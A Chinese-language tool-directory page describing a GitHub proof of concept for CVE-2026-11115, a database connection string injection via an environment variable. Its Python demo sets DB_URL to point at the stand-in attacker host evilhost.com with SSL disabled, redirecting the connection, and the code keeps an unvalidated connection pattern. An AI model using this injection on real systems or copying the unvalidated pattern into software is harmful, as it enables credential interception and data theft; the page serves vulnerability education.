Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
漏洞分析漏洞利用渗透测试错误配置学习与教育数据库安全
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

用于 CVE-2026-11115 的最小化 Python 概念验证(PoC),演示了通过环境变量实现数据库连接字符串注入,以及将连接重定向到攻击者控制的 PostgreSQL 主机。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
61个月前尚未审核
分享

CVE-2026-11115 – 通过环境变量进行数据库连接字符串注入

程序代码(Python)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – 数据库连接字符串注入

Severity: High

概述

应用程序在未经验证的情况下,从环境变量构建其数据库连接字符串。如果攻击者能够影响该变量(例如,通过服务端请求伪造或 CI/CD 管道配置错误),他们就可以将数据库连接重定向到自己的服务器,从而拦截或修改数据。

漏洞详情

  • 类型: 连接字符串注入
  • 影响: 数据外泄、中间人攻击。
  • 根本原因: 完整的连接 URI 取自环境变量,并且可以附加额外参数(如 host)来覆盖原始主机。

漏洞利用演示

运行模拟:

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

该程序将尝试连接 evilhost.com,而不是 localhost。

下载工具